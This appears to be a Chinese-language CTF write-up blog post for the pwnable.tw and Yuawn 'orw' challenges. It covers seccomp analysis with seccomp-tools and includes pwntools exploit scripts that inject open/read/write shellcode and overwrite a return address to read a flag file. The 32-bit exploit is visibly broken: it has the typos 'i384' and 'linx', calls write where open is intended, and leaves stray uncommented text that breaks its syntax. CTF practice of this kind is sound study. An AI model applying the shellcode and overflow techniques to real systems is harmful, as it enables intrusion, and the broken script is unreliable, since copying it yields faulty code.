165 words
1 minutes
pwnable orw & yuawn orw Writes up
2024-08-07
Cyber Security
CTF

pwntools Review#

設定環境:

context(arch='i386',os='linux')

暫存器 Review#

暫存器位元
rax64
eax32

What is orw#

利用 open,read and write 這三個 systemcall 去取得 flag

What is seccomp?#

分析程式的 seccomp 狀態,查看哪一些 system call 被禁用

download :

sudo apt install gcc ruby-dev
gem install seccomp-tools

起手式#

seccomp-tools dump <filename>

demo yuawn orw (64 bits)#

Recon#

file:

image

r2:

image

發現 sc 的部分是全域變數,然後他有給你位置,並且下面有一個 I give you bof 是用 gets 去讀,並且大小為 0x10+0x8

seccomp:

image

exploit#

from pwn import *

context(arch='amd64',os='linux')

r=process('./orw')
                                                        #利用('rax','rsp')去寫入
r.sendline(asm(shellcraft.open('/flag')+shellcraft.read('rax','rsp',0x100)+shellcraft.write(1,'rsp',0x100)))
                        #利用(1,'rsp',0x100)去寫入
r.sendlineafter(b':)', b'a'*0x18 + p64(0x6010a0))
r.interactive()

demo pwnable orw (32 bits)#

labs: https://pwnable.tw/static/chall/orw

Recon#

file:

image

checksec:

image

exec:

image

seccomp:

image

disas main:

image

exploit#


from pwn import *

context(arch='i384',os='linx')

r=remote('chall.pwnable.tw',10001)
                                         #讀利用(eax,esp,大小)
sc=asm(shellcraft.write('/home/orw/flag')+shellcraft.read('eax','ebp',0x100)+shellcraft.write(1,'ebp',0x100)) 寫利用(1,'esp',大小)

r.sendlineafter(':',sc)

r.interactive()

References:#

https://kazma.tw/2023/12/10/Yuawn-Pwn1-orw-Writeup/

https://kazma.tw/2024/02/07/Pwnable-tw-orw-Writeup/

https://www.youtube.com/watch?v=U8N6aE-Nq-Q

pwnable orw & yuawn orw Writes up
https://dkri3c1.github.io/posts/pwn-pwnable-and-yuawn-wp/
Author
dkri3c1
Published at
2024-08-07
lys rop2 Writes up
lys rop1 Writes up